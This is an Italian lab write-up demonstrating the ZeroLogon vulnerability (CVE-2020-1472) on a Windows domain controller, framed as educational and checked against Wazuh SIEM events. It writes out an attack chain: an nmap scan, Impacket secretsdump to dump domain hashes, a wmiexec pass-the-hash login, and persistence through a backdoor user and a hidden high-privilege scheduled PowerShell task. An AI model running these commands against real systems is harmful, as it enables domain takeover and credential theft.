
Spiegazione e dimostrazione della vulnerabilità ZeroLogon (CVE-2020-1472)
Spiegazione e dimostrazione della vulnerabilità ZeroLogon (CVE-2020-1472)
L'obiettivo di questo laboratorio è strettamente educativo. La sua esecuzione non è consigliata in ambienti di produzione o che non ti appartengono.
Contesto della vulnerabilità
Questa vulnerabilità consente a un criminale informatico di prendere il controllo di un Controller di Dominio (DC). Ciò viene fatto modificando o rimuovendo la password di un account di servizio sul controller. L'agente malintenzionato può semplicemente causare un denial of service o prendere il controllo e possedere l'intera rete. Ad agosto 2020, Microsoft ha rilasciato una patch.
Componente interessato: Microsoft Netlogon Remote Protocol (MS-NRPC)
Versioni di Windows interessate:
Clonare i repository
Se vuoi eseguirlo localmente!
Su AWS è anche possibile con queste immagini (attenzione alla fatturazione)
Extra: Un account su Wazuh per l'analisi degli eventi SIEM.
Consiglio: Su Kali Linux, il servizio SSH è disattivato per impostazione predefinita — è necessario avviarlo manualmente.
Prima di testare se il server è vulnerabile, possiamo usare nmap per vedere quali porte sono aperte:
nmap -sS -T4 -F --open -n ip
Usando CVE-2020-1472 - Test se il server target è vulnerabile. Esegui il comando:
zerologon_tester.py <dc-name> <dc-ip>
Lo strumento secretsdump è un toolkit di Impacket
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
Se tutto va bene, riusciremo a fare il login con l'hash Cos'è un attacco pass-the-hash?
Ora creiamo una persistenza! Può essere un nuovo utente!
net user coringa Batman2025 /add
Fatto! L'utente è stato creato con successo!
È anche possibile creare un'attività!
mkdir C:\Temp
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
È possibile vedere la creazione degli utenti e gli eventi relativi al pass-the-hash e alla creazione di utenti!